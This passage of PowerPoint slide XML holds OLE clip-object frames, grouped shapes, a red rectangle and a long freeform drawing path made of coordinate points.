        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s294031" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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5057775"/>
                        <a:ext cx="857250" cy="8985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5837238" y="3548063"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s294032" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">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7238" y="3548063"/>
                        <a:ext cx="862012" cy="9001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6152" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4676775"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6149" name="Object 5"/>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94033" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319"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6189" name="Rectangle 8"/>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6190" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6191" name="Freeform 10"/>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92" name="Freeform 11"/>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93" name="Freeform 12"/>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94" name="Freeform 13"/>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95" name="Freeform 14"/>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96" name="Freeform 15"/>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97" name="Freeform 16"/>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98" name="Freeform 17"/>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99" name="Freeform 18"/>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00" name="Freeform 19"/>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01" name="Freeform 20"/>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02" name="Freeform 21"/>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03" name="Freeform 22"/>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04" name="Freeform 23"/>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05" name="Freeform 24"/>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06" name="Freeform 25"/>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07" name="Freeform 26"/>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08" name="Freeform 27"/>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09" name="Freeform 28"/>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10" name="Freeform 29"/>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11" name="Freeform 30"/>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12" name="Freeform 31"/>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13" name="Freeform 32"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6153" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3381375"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6148" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s294034" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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 y="1003"/>
                          <a:ext cx="324" cy="3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6164" name="Rectangle 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6165" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6166" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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6"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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6" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
